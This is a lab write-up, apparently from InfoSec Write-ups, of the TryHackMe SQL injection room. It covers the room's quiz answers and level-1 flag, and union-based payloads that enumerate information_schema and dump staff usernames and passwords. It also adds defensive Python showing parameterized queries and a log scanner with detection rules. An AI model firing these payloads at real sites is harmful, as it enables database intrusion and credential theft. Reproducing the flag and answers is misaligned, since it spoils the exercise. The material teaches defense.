SQL Injection (Jr. Penetration Tester) - TryHackMe

Mukilan Baskaran, published in InfoSec Write-ups, Oct 24, 2021

Hi, amazing hackers! In this story you are going to learn what SQL injection is and how to find its different types.

SQL injection, abbreviated SQLi, is an attack on a web application's database in which the attacker gets the application to execute malicious queries, which can result in the theft, modification, or deletion of customer data.

Frankly speaking, this is the most dangerous vulnerability, and it arises from user input that is unsanitized or not properly validated before it is placed in a query.

What is the acronym for the software that controls a database?

Ans: DBMS

What is the name of the grid-like structure which holds the data?

Ans: table

SQL stands for Structured Query Language. It is used to query a database and retrieve the information a customer needs, and only authenticated users should be able to do so. SQL has a set of commands, each of which performs an operation.

SQL commands include SELECT, INSERT, DROP, DELETE, CREATE, and so on. Each command performs a distinct operation.

SELECT:

This command is used to retrieve data from the database.

select * from users;

This selects every column of every row from the users table.

UNION

This command combines the results of two or more SELECT statements, retrieving data from one or several tables. Each SELECT in the UNION must return the same number of columns, which is why the column count matters later in the practical section.

SELECT name,address,city,postcode from customers UNION SELECT company,address,city,postcode from suppliers;

INSERT

It is used to insert a new row of data into the database.

insert into users (username,password) values ('bob','password123');

UPDATE

It is used to update one or more rows of data within the table.

update users SET username='root',password='pass123' where username='admin';

DELETE

It is used to delete one or more rows of data.

delete from users where username='martin';

What SQL statement is used to retrieve data?

Ans: SELECT

What SQL clause can be used to retrieve data from multiple tables?

Ans: Union

What SQL statement is used to add data?

Ans: INSERT

What character signifies the end of an SQL query?

Ans: ;

SQL injection can be classified into three main types:

In-Band SQL Injection, Error-Based SQL Injection, and Union-Based SQL Injection.

A practical approach to finding In-band SQLi:

This type of SQL injection is found when entering special characters into a parameter causes a database error message to be displayed directly in the browser.

The practical example above shows that the site has error-based SQL injection, so next we need to find out how many columns the queried table returns.

This shows that the table does not have one or two columns.

The table has three columns.

In the above example, I set id=0 instead of 1 because the query needs to display the data.

We find the database names using the above command.

We find the table names in the database using: 0 UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'sqli_one'

We find the column names using: 0 UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_name = 'staff_users'

Finally, we find the juicy information in those columns using: 0 UNION SELECT 1,2,group_concat(username,':',password SEPARATOR '<br>') FROM staff_users
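The root cause named at the start of this story (unsanitized input pasted into a query) is what makes the UNION steps above work. The following is an added example, not code from the original post or from the TryHackMe room: a constructed SQLite database with an article table and a staff_users table, a vulnerable lookup that formats the id straight into the SQL, and the hardened version that validates the type and binds the value with a placeholder. The payload is the write-up's final one adapted to SQLite syntax (SQLite's group_concat takes the separator as a second argument and uses || for concatenation where MySQL uses CONCAT and SEPARATOR); the table contents are made up.

```python
import sqlite3


def build_db():
    """Constructed sample data (not from the room): a news site with an
    article table read by id, plus the staff_users table the write-up dumps."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO article VALUES (1, 'Hello', 'first article');
        INSERT INTO article VALUES (2, 'Second', 'second article');
        CREATE TABLE staff_users (username TEXT, password TEXT);
        INSERT INTO staff_users VALUES ('martin', 'p4ssword');
        INSERT INTO staff_users VALUES ('admin', 'adminpass');
    """)
    return conn


def get_article_vulnerable(conn, article_id):
    """The id is pasted straight into the query string, so whoever controls
    the parameter controls part of the SQL. This is the bug the room exploits."""
    sql = f"SELECT id, title, body FROM article WHERE id = {article_id}"
    return conn.execute(sql).fetchall()


def get_article_safe(conn, article_id):
    """Validate the type first (ids are integers), then bind the value with a
    placeholder so the driver never interprets it as SQL."""
    try:
        article_id = int(article_id)
    except (TypeError, ValueError):
        return []
    sql = "SELECT id, title, body FROM article WHERE id = ?"
    return conn.execute(sql, (article_id,)).fetchall()


# The write-up's last payload in SQLite syntax. id=0 matches no article, so
# the only row returned comes from the UNIONed SELECT.
PAYLOAD = ("0 UNION SELECT 1,2,group_concat(username||':'||password, '<br>') "
           "FROM staff_users")

if __name__ == "__main__":
    conn = build_db()
    print("vulnerable:", get_article_vulnerable(conn, PAYLOAD))
    print("safe:      ", get_article_safe(conn, PAYLOAD))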

What is the flag after completing level 1?

Ans: THM{SQL_INJECTION_3840}

I found the above flag by logging in as martin; the flag is displayed on the website.
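The probing sequence in this level (a quote that triggers the error, column-count guesses, then UNION queries against information_schema) also leaves a clear trail in the web server's access log. The following added example is not from the original post or the TryHackMe room: it parses constructed Apache-style log lines, URL-decodes the query string (twice, to catch double-encoded payloads) and flags the patterns used above. The IPs, timestamps and paths are made up, and the rule names are my own.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines (not real traffic): a normal request, a quote
# probe that produced a 500, a column-count probe, and the encoded UNION query.
LOG_LINES = [
    '10.0.0.5 - - [24/Oct/2021:10:00:01 +0000] "GET /article?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [24/Oct/2021:10:00:07 +0000] "GET /article?id=1%27 HTTP/1.1" 500 233',
    '10.0.0.9 - - [24/Oct/2021:10:00:15 +0000] "GET /article?id=0+UNION+SELECT+1,2,3 HTTP/1.1" 200 540',
    '10.0.0.9 - - [24/Oct/2021:10:00:31 +0000] "GET /article?id=0%20UNION%20SELECT%201,2,group_concat(table_name)%20FROM%20information_schema.tables HTTP/1.1" 200 610',
]

# Common log format: ip ident user [timestamp] "METHOD URL PROTO" status size
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# Detection rules applied to the decoded query string. "quote-probe" alone is
# noisy (names like O'Brien) and is best treated as low severity.
RULES = [
    ("union-select", re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)),
    ("schema-enum", re.compile(r"\binformation_schema\b", re.I)),
    ("quote-probe", re.compile(r"'")),
]


def decode_query(url):
    """Return the query string with percent- and plus-encoding removed; decoding
    twice also unwraps a double-encoded payload such as %2527."""
    query = urlsplit(url).query
    return unquote_plus(unquote_plus(query))


def scan_line(line):
    """Return the names of the rules that fire on a single log line."""
    m = REQUEST_RE.match(line)
    if not m:
        return []
    decoded = decode_query(m.group("url"))
    return [name for name, pat in RULES if pat.search(decoded)]


def scan_log(lines):
    """Return (source ip, decoded query, rules hit) for every flagged line."""
    hits = []
    for line in lines:
        names = scan_line(line)
        if names:
            m = REQUEST_RE.match(line)
            hits.append((m.group("ip"), decode_query(m.group("url")), names))
    return hits


if __name__ == "__main__":
    for ip, query, names in scan_log(LOG_LINES):
        print(f"{ip}  {names}  {query}")
```

Decoding before matching matters: the third and fourth lines carry the same UNION keyword, one with "+" and one with "%20", and a rule that matched the raw request line would miss one of them. Correlating the hits by source IP, as scan_log does, turns three individually weak signals into one clear picture of enumeration from a single client.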

We will look at more types of SQL injection in the next blog. For updates, click the follow button and subscribe via email. See you soon in the next blog.
